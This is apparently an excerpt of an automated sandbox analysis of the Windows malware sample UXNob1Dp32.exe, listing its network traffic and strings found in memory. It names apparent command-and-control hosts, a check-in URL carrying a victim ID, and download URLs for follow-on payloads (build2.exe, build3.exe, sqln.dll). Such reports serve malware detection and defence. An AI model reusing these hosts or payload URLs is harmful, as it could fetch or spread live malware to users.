Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.9.149

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.9.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic	HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com

Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: UXNob1Dp32.exe, 00000006.00000003.1731626574.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: UXNob1Dp32.exe, 00000005.00000003.1731782317.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: UXNob1Dp32.exe, 00000005.00000003.1731881765.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: api.2ip.ua

Source: unknown

Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe
Source: UXNob1Dp32.exe, 00000005.00000003.2140752652.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142129003.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2203120447.0000000003129000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194555640.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171232351.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2100184985.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183240197.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121385016.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182771733.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188633611.0000000003128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$run
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runL
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe$runinstall020921_delay721_sec.exe0D32.exe
Source: UXNob1Dp32.exe, 00000005.00000003.2140752652.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142129003.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2203120447.0000000003129000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194555640.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171232351.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2100184985.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183240197.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121385016.0000000003128000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182771733.00000000030FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188633611.0000000003128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exe?
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/files/1/build3.exerun80I
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000696000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.000000000075E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php
Source: UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueD
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.phpA
Source: UXNob1Dp32.exe, 00000005.00000003.1737013197.00000000097F0000.00000004.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1737286972.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: UXNob1Dp32.exe, 00000000.00000002.1628788934.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1648071657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000003.00000002.1653029780.0000000005E50000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000004.00000002.1660077105.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201107197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.00000000006A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe/
Source: UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exerun35g
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: UXNob1Dp32.exe, 00000006.00000003.1731553154.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: UXNob1Dp32.exe, 00000005.00000003.1731640705.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: UXNob1Dp32.exe, 00000006.00000003.1731679885.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: UXNob1Dp32.exe, 00000005.00000003.1731709480.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: UXNob1Dp32.exe, 00000006.00000003.1731742311.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: build2.exe, 00000009.00000002.1937949798.0000000020DF9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1937611262.000000001E8ED000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: UXNob1Dp32.exe, 00000005.00000003.1731782317.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: UXNob1Dp32.exe, 00000006.00000003.1731828683.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: UXNob1Dp32.exe, 00000005.00000003.1731881765.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1934156488.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149
Source: build2.exe, 00000009.00000002.1934156488.000000000051A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149.exe
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/.
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/2
Source: build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/:
Source: build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/D
Source: build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/G/
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/L
Source: build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/n
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/nd-point:
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/pet
Source: build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/s
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/sqln.dll
Source: build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/x.c
Source: build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/~
Source: build2.exe, 00000009.00000002.1934156488.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149PUA4832FF8~YAAQLwwtFycGjvGKAQAAIGQc
Source: build2.exe, 00000009.00000002.1934156488.0000000000558000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149a
Source: UXNob1Dp32.exe, 00000005.00000003.1735244764.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: UXNob1Dp32.exe, 00000001.00000003.1643163181.000000000074B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000003.1641969430.000000000074A000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000001.00000002.1650388933.0000000000738000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000002.2201568233.0000000000647000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: UXNob1Dp32.exe, 00000006.00000002.4081262958.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000006.00000002.4080150967.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: UXNob1Dp32.exe, 00000005.00000003.1735244764.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
Source: UXNob1Dp32.exe, 00000005.00000003.1735244764.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: UXNob1Dp32.exe, 00000005.00000003.1735244764.00000000097F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.aka
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: build2.exe, 00000009.00000003.1764810001.000000000099D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=2YYI
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: build2.exe, 00000009.00000003.1821060578.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1840334964.000000000099B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000002.1935491088.0000000000993000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000009.00000003.1801261557.000000000099D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
